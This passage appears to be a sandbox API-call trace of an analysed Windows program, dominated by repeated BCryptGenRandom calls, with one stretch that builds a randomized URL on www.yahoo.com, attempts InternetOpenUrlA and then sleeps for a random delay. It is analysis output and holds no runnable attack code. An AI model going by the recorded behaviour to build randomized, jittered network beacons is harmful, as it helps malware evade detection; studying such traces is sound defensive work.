(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0216.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.035] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.036] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.036] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.036] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.037] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.037] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.037] GetProcessHeap () returned 0x440000 [0216.037] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0216.037] lstrcpyA (in: lpString1=0x4724e0, lpString2="8\x8b¾\x0fs://www.yahoo.com" | out: lpString1="8\x8b¾\x0fs://www.yahoo.com") returned="8\x8b¾\x0fs://www.yahoo.com" [0216.038] lstrcatA (in: lpString1="8\x8b¾\x0fs://www.yahoo.com", lpString2="/3Q6a8u8irFewh2a2Gie/5mh8e268zfayd65wMcgtV83efclnBg2ocmefd4t/" | out: lpString1="8\x8b¾\x0fs://www.yahoo.com/3Q6a8u8irFewh2a2Gie/5mh8e268zfayd65wMcgtV83efclnBg2ocmefd4t/") returned="8\x8b¾\x0fs://www.yahoo.com/3Q6a8u8irFewh2a2Gie/5mh8e268zfayd65wMcgtV83efclnBg2ocmefd4t/" [0216.038] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0216.038] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="8\x8b¾\x0fs://www.yahoo.com/3Q6a8u8irFewh2a2Gie/5mh8e268zfayd65wMcgtV83efclnBg2ocmefd4t/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0216.038] GetProcessHeap () returned 0x440000 [0216.038] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0216.038] GetProcessHeap () returned 0x440000 [0216.038] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0216.038] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0216.038] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0216.039] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0216.039] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0216.039] Sleep (dwMilliseconds=0x1d063) [0216.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0216.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0216.521] GetProcessHeap () returned 0x440000 [0216.521] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a03050 [0216.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0216.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03051, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a03051) returned 0x0 [0216.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0216.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0216.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0306a, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a0306a) returned 0x0 [0216.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0216.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0307e, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a0307e) returned 0x0 [0216.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0216.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03096, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a03096) returned 0x0 [0216.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.541] BCryptGenRandom 